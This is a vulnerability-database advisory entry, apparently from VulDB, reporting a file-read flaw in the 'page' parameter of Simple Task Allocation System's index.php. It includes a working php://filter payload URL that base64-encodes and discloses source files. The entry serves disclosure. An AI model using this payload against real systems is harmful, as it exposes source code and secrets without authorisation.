| 제목 | There is a file reading vulnerability in index.php of Simple Task Allocation System |
|---|
| 설명 | The page parameter in line 77 of Simple Task Allocation System's index.php is controllable, and users can construct malicious urls to achieve high-risk vulnerabilities in file reading
http://127.0.0.1/php-sqlite-task-allocation-system/?page=users
can be constructed as
http://127.0.0.1/php-sqlite-task-allocation-system/?page=php://filter/read=convert.base64-encode/resource=users
source url:https://www.sourcecodester.com/php/16358/simple-task-allocation-system-using-php-and-sqlite-source-code-free-download.html |
|---|
| 원천 | ⚠️ https://github.com/Pe4cefulSnow/CVE-Advisory/blob/main/uploadcve.md |
|---|
| 사용자 | Pe4cefulSnow (UID 34389) |
|---|
| 제출 | 2023. 03. 31. AM 11:32 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 04. 01. AM 10:39 (23 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 224724 [SourceCodester Simple Task Allocation System 1.0 index.php page 정보 공개] |
|---|
| 포인트들 | 20 |
|---|